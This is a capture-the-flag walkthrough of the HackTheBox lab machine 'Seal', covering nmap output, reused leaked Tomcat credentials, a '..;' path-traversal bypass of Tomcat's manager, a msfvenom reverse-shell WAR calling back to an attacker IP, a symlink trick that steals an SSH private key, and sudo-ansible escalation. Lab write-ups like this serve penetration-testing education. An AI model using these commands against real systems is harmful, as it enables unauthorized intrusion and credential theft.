SEAL

Scanning

NMAP

➜  ~ sudo nmap -F seal.htb           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 08:24 EDT
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.16s latency).
Not shown: 97 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
443/tcp  open  https
8080/tcp open  http-proxy
​
Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds

fast scan 1.16 seconds at first ... take a look on these till deep scan finished

➜  ~ sudo nmap -T4 -p- -A seal.htb       
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 08:13 EDT
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.22s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Thu, 19 Aug 2021 12:23:54 GMT
|     Set-Cookie: JSESSIONID=node01frvnjr75rhdfsbmdepqve4n287.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   GetRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Thu, 19 Aug 2021 12:23:52 GMT
|     Set-Cookie: JSESSIONID=node05b59i0stcc6s1ffnbtlbvqhoe85.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Thu, 19 Aug 2021 12:23:53 GMT
|     Set-Cookie: JSESSIONID=node01ru35o66qwp7pncfzoorb2jyt86.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   Socks4: 
|     HTTP/1.1 400 Illegal character CNTL=0x4
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
|   Socks5: 
|     HTTP/1.1 400 Illegal character CNTL=0x5
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
​
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   128.44 ms 10.10.16.1
2   228.82 ms seal.htb (10.10.10.250)
​
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 709.02 seconds

Enumeration

port 8080

register and signin

at first look we find some username root, luis, alex

scrolling news feed find this

open it ...

credentials tomcat:42MrHBf*z8{Z%

try to login with it ... ERROR

try others users ... logged with luis using same password luis:42MrHBf*z8{Z%

no thing interesting here for now

port 443

Directory busting

from error page and gitbucket we know server run tomcat

/manager/status.xsd (Status: 200) [Size: 4374]

open it try credentials tomcat:42MrHBf*z8{Z%

we IN πŸ‘

Exploit

Trying Path Traversal

you need to know this first

https://seal.htb/manager/status/..;/html

open application manager

we can upload files here

lets generate reverse shell using msf read this

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.30 LPORT=9999 -f war -o rshell.war

set msf listener

we lose our path lets use burp to edit this

read this page to understand what is going under the hood

edit post request to /manager/jmxproxy/..;/html/upload

uploaded successfully

trigger it ...

we have reverse shell

Privilege Escalation

what's running here ps -aux

Backup Script

let's link luis/.ssh to be backup

ln -s /home/luis/.ssh/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

find archive name

ls /opt/backups/archives/

copy it

cp /opt/backups/archives/backup-2021-07-13-03:00:32.gz rsa.gz

unzip ...

gzip -kd rsa.gz tar -xf rsa

follow path to private key

cd dashboard

cd upload

cd .ssh

cat id_rsa

copy it to your local machine

Root User

check sudo rights

read these first ...

https://www.redhat.com/en/topics/automation/what-is-an-ansible-playbook

https://www.middlewareinventory.com/blog/ansible-command-examples/

create file with any name "root.yml"

run

-p Turned on whenever the real and effective user ids do not match. Disables processing of the $ENV file and importing of shell functions. Turning this option off causes the effective uid and gid to be set to the real uid and gid.

PreviousPITNextKIOPTRIX Series

Last updated